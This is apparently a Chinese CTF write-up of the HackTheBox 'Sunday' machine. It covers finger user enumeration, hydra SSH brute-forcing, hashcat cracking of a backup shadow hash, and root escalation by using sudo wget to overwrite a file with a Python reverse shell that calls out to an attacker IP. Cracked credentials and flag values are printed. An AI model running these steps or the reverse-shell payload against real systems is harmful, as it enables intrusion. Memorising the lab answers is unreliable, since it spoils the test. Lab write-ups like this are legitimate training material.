[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提升

信息收集

IP Address Opening Ports
10.10.10.76 TCP:79, 111, 515, 6787, 22022

$ nmap -p- 10.10.10.76 --min-rate 1000 -sC -sV

bash 复制代码
PORT      STATE SERVICE VERSION
79/tcp    open  finger?
| fingerprint-strings:
|   GenericLines:
|     No one logged on
|   GetRequest:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help:
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest:
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie:
|_    Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
|_http-title: 400 Bad Request
|_http-server-header: Apache
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)

Finger

$ wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

$ tar -zxvf finger-user-enum-1.0.tar.gz

$ cd finger-user-enum-1.0

$ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

$ hydra -L user.txt -p 'sunday' ssh://10.10.1

username:sunny password:sunday

sunny 横向 sammy

$ ssh -p 22022 sunny@10.10.10.76

sunny@sunday:~$ cat /backup/shadow.backup

$ echo '$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB'>hash

$ hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt --force

username:sammy password:cooldude!

User.txt

be9b6b0e94d29be3bfc0373008b2b38a

权限提升

$ ssh -p 22022 sammy@10.10.10.76

$ sudo /usr/bin/wget http://10.10.16.18/reverse.py -O /root/troll

python 复制代码
#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.18",10032))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

$ sudo /root/troll

脚本将每五秒自动恢复/root/troll初始状态,所以需要快速输入

Root.txt

59b946dc21f12651e440bbfd962cbff0

相关推荐
易ლ拉罐11 小时前
【计算机网络】HTTP协议(二)——超文本传输协议
网络·计算机网络·http·1024程序员节
极客范儿12 小时前
新华三H3CNE网络工程师认证—STP状态机与收敛过程
服务器·网络·stp·1024程序员节
LCMICRO-1331084774612 小时前
长芯微LDUM3160完全P2P替代ADUM3160,LDUM3160是一款采用ADI公司iCoupler® 技术的USB端口隔离器
网络·stm32·单片机·嵌入式硬件·网络协议·fpga开发·硬件工程
威迪斯特12 小时前
网络环路:隐形威胁的破解之道
网络·流量分析·生成树协议·端口安全·路由过滤·网络环路·广播风暴
isNotNullX13 小时前
一文讲清:数据清洗、数据中台、数据仓库、数据治理
大数据·网络·数据库·数据分析·1024程序员节
云飞云共享云桌面13 小时前
东莞精密机械制造工厂5个SolidWorks设计共享一套软件
运维·服务器·网络·人工智能·自动化·制造
李辰洋13 小时前
IPv6路由技术
运维·服务器·网络
卓豪终端管理13 小时前
从发现到阻止:构建自动化内部威胁防线的核心步骤
网络·安全·web安全
Fms_Sa16 小时前
UDP实现客服与客户的咨询对话
网络·网络协议·udp
haogexiaole16 小时前
DNS解析原理及工作流程详解
网络·github